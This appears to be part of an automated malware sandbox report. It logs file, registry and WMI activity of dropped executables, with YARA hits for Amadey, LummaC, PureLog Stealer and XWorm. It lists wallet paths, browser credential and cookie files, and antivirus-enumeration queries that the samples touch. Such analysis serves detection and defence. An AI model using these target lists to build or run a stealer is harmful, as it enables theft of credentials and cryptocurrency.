Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\_bz2.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\_lzma.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\_wmi.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\_socket.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\select.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Queries volume information: C:\Users\user\AppData\Roaming\d0HNrLB.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Queries volume information: C:\Users\user\AppData\Roaming\d0HNrLB.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00CF7155

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

2_2_00F761F0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00FAE68E _free,_free,_free,GetTimeZoneInformation,_free,

2_2_00FAE68E

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00CF2BFB

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1395821864.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000002.1531426970.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1494460340.0000000001148000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1525427273.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1524873724.000000000113D000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2349507633.000000000131C000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2452462854.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2452462854.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2452175807.0000000003291000.00000004.00000800.00020000.00000000.sdmp, d0HNrLB.exe, 0000001A.00000002.2540916192.0000000001346000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 14.2.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.1s89v4.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.1s89v4.exe.f70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rapes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1538310324.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2X0520.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: khykuQw.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: 22.2.khykuQw.exe.e60000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.zY9sqWs.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.zY9sqWs.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.2X0520.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2534632505.000000000058A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2514951557.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 33.2.d0HNrLB.exe.34f9550.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.d0HNrLB.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\d0HNrLB[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.d0HNrLB.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.d0HNrLB.exe.353e970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000002.2463770146.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d0HNrLB.exe PID: 4052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d0HNrLB.exe PID: 4664, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 2X0520.exe, 00000008.00000003.1396029487.0000000001192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 2X0520.exe, 00000008.00000003.1385483236.000000000113D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 2X0520.exe, 00000008.00000003.1396171062.000000000119C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: 2X0520.exe, 00000008.00000003.1396132150.0000000001147000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 2X0520.exe, 00000008.00000003.1396029487.0000000001192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 2X0520.exe, 00000008.00000003.1385483236.0000000001122000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
